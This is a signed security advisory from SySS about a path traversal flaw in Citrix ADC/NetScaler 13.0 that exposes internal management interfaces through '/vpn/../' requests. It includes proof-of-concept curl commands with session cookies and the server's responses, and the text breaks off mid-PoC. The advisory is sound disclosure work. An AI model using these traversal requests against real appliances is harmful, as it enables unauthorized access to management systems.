-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2020-020 Product: ADC/NetScaler Manufacturer: Citrix Tested Version(s): NS13.0 52.24 Vulnerability Type: Relative Path Traversal (CWE-23) Risk Level: Low Solution Status: Open Manufacturer Notification: 2020-05-06 Public Disclosure: 2020-10-02 CVE Reference: None assigned Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: NetScaler/Citrix ADC is a multi-protocol reverse proxy appliance, commonly used to externally provide Citrix Remote Desktop Services or SSL VPN. The manufacturer describes the product as follows (see [1]): "Citrix ADC is the most comprehensive application delivery and load balancing solution for monolithic and microservices-based applications. Which means you can deliver a better user experience, on any device—anywhere." Due to missing path normalization/validation, Citrix ADC is vulnerable to path traversal attacks, hence allowing access to internal management resources from the external appliance interface (virtual IP). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Even though this has been one of the primary parts of the recent critical Citrix ADC vulnerability [2], the path provided by the vendor merely prevents this specific vector (and addresses some of the vulnerabilities of the targeted script). In general, request dispatching of the front-end reverse proxy service to the back end, specifically the local web server providing user front-end and management web interfaces, is purely based on prefix matching and does not implement proper mitigations of path traversal attacks. Authenticated users can, for example, access the following resources on the management server through the external interface (virtual IP): - - https://$NETSCALER/vpn/../admin_ui/php/index.php - - https://$NETSCALER/vpn/../nitro/v1/{...} Moreover, a SOAP web service handler (Apache mod_gsoap) can be reached at https://$NETSCALER/vpn/../soap. However, this handler appears to be defunct in the tested version. While none of these services appear to be directly useable/exploitable, they still expose a significant additional attack surface. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): While both > curl -k -v --path-as-is https://$NETSCALER/vpn/../admin_ui/php/index.php \ -H "Cookie: NSC_AAAC={...}" and > curl -k -v --path-as-is https://$NETSCALER/vpn/../nitro/v1/config \ -H "Cookie: NSC_AAAC={...}" result in an HTTP 404 error, < HTTP/1.1 404 Not Found < Date: Tue, 05 May 2020 13:01:52 GMT < Server: Apache < X-Frame-Options: SAMEORIGIN < X-XSS-Protection: 1; mode=block further investigation shows that these requests are actually reaching the PHP interpreter and application code at: - - /netscaler/ns_gui/admin_ui/php/index.php - - /netscaler/ns_gui/admin_ui/nitro/nitro.php The 404 error merely is caused by each script's internal routing not recognizing the request path > curl -k --path-as-is https://$NETSCALER/vpn/../ -H "Cookie: NSC_AAAC={...}" - -> [...]
Support Blocked!